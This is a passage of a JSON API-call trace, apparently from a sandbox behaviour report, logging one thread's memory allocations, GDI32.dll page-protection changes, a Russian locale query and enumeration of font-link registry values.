                "value": "0x05922000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 205
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000254"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000009",
                "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Session Manager"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager"
              }
            ],
            "repeated": 0,
            "id": 206
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000254"
              },
              {
                "name": "ValueName",
                "value": "ResourcePolicies"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies"
              }
            ],
            "repeated": 0,
            "id": 207
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              }
            ],
            "repeated": 0,
            "id": 208
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00840000"
              },
              {
                "name": "RegionSize",
                "value": "0x0001a000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 209
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00840000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 210
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05924000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 211
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05925000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 212
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 213
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 214
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 215
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 216
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "system",
            "api": "GetUserDefaultLCID",
            "status": true,
            "return": "0x00000419",
            "arguments": [
              {
                "name": "SystemDefaultLangID",
                "value": "0x00000419"
              },
              {
                "name": "LanguageName",
                "value": "Russian"
              }
            ],
            "repeated": 0,
            "id": 217
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x008d7000"
              },
              {
                "name": "RegionSize",
                "value": "0x00005000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 218
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x008dc000"
              },
              {
                "name": "RegionSize",
                "value": "0x00005000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 219
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x80000002",
                "pretty_value": "HKEY_LOCAL_MACHINE"
              },
              {
                "name": "SubKey",
                "value": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink"
              },
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink"
              }
            ],
            "repeated": 0,
            "id": 220
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegQueryInfoKeyW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000254"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "SubKeyCount",
                "value": "0"
              },
              {
                "name": "MaxSubKeyLength",
                "value": "0"
              },
              {
                "name": "MaxClassLength",
                "value": "0"
              },
              {
                "name": "ValueCount",
                "value": "67"
              },
              {
                "name": "MaxValueNameLength",
                "value": "27"
              },
              {
                "name": "MaxValueLength",
                "value": "0"
              }
            ],
            "repeated": 0,
            "id": 221
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x008e1000"
              },
              {
                "name": "RegionSize",
                "value": "0x00003000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 222
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "ValueName",
                "value": "Lucida Sans Unicode"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Lucida Sans Unicode"
              }
            ],
            "repeated": 0,
            "id": 223
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "1"
              },
              {
                "name": "ValueName",
                "value": "Microsoft Sans Serif"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Microsoft Sans Serif"
              }
            ],
            "repeated": 0,
            "id": 224
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "2"
              },
              {
                "name": "ValueName",
                "value": "Tahoma"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Tahoma"
              }
            ],
            "repeated": 0,
            "id": 225
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "3"
              },
              {
                "name": "ValueName",
                "value": "Segoe UI"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Segoe UI"
              }
            ],
            "repeated": 0,
            "id": 226
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "4"
              },
              {
                "name": "ValueName",
                "value": "Segoe UI Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Segoe UI Bold"
              }
            ],
            "repeated": 0,
            "id": 227
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "5"
              },
              {
                "name": "ValueName",
                "value": "Segoe UI Light"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Segoe UI Light"
              }
            ],
            "repeated": 0,
            "id": 228
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "6"
              },
              {
                "name": "ValueName",
                "value": "Segoe UI Semilight"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Segoe UI Semilight"
              }
            ],
            "repeated": 0,
            "id": 229
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "7"
              },
              {
                "name": "ValueName",
                "value": "Segoe UI Semibold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Segoe UI Semibold"
              }
            ],
            "repeated": 0,
            "id": 230
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "8"
              },
              {
                "name": "ValueName",
                "value": "Ebrima"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Ebrima"
              }
            ],
            "repeated": 0,
            "id": 231
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "9"
              },
              {
                "name": "ValueName",
                "value": "Ebrima Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Ebrima Bold"
              }
            ],
            "repeated": 0,
            "id": 232
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "10"
              },
              {
                "name": "ValueName",
                "value": "Gadugi"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Gadugi"
              }
            ],
            "repeated": 0,
            "id": 233
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "11"
              },
              {
                "name": "ValueName",
                "value": "Gadugi Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Gadugi Bold"
              }
            ],
            "repeated": 0,
            "id": 234
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "12"
              },
              {
                "name": "ValueName",
                "value": "Khmer UI"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Khmer UI"
              }
            ],
            "repeated": 0,
            "id": 235
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "13"
              },
              {
                "name": "ValueName",
                "value": "Khmer UI Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Khmer UI Bold"
              }
            ],
            "repeated": 0,
            "id": 236
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "14"
              },
              {
                "name": "ValueName",
                "value": "Lao UI"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Lao UI"
              }
            ],
            "repeated": 0,
            "id": 237
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "15"
              },
              {
                "name": "ValueName",
                "value": "Lao UI Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Lao UI Bold"
              }
            ],
            "repeated": 0,
            "id": 238
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "16"
              },
              {
                "name": "ValueName",
                "value": "Leelawadee"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Leelawadee"
              }
            ],
            "repeated": 0,
            "id": 239
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "17"
              },
              {
                "name": "ValueName",
                "value": "Leelawadee Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Leelawadee Bold"
              }
            ],
            "repeated": 0,
            "id": 240
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "18"
              },
              {
                "name": "ValueName",
                "value": "Leelawadee UI"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Leelawadee UI"
              }
            ],
            "repeated": 0,
            "id": 241
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "19"
              },
              {
                "name": "ValueName",
                "value": "Leelawadee UI Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Leelawadee UI Bold"
              }
            ],
            "repeated": 0,
            "id": 242
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "20"
              },
              {
                "name": "ValueName",
                "value": "Nirmala UI"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Nirmala UI"
              }
            ],
            "repeated": 0,
            "id": 243
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "21"
              },
              {
                "name": "ValueName",
                "value": "Nirmala UI Bold"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Nirmala UI Bold"
              }
            ],
            "repeated": 0,
            "id": 244
          },
          {
            "timestamp": "2025-11-20 10:58:26,078",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x140056880",
            "category": "registry",
            "api": "RegEnumValueW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000254"
              },
              {
                "name": "Index",
                "value": "22"
              },
              {
                "name": "ValueName",
                "value": "Nirmala UI Semilight"
              },
              {
                "name": "Type",
                "value": "7",
                "pretty_value": "REG_MULTI_SZ"
              },
              {
                "name": "DataLength",
                "value": "0"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontLink\\SystemLink\\Nirmala UI Semilight"
              }
            ],
            "repeated": 0,
            "id": 245
          },
          {
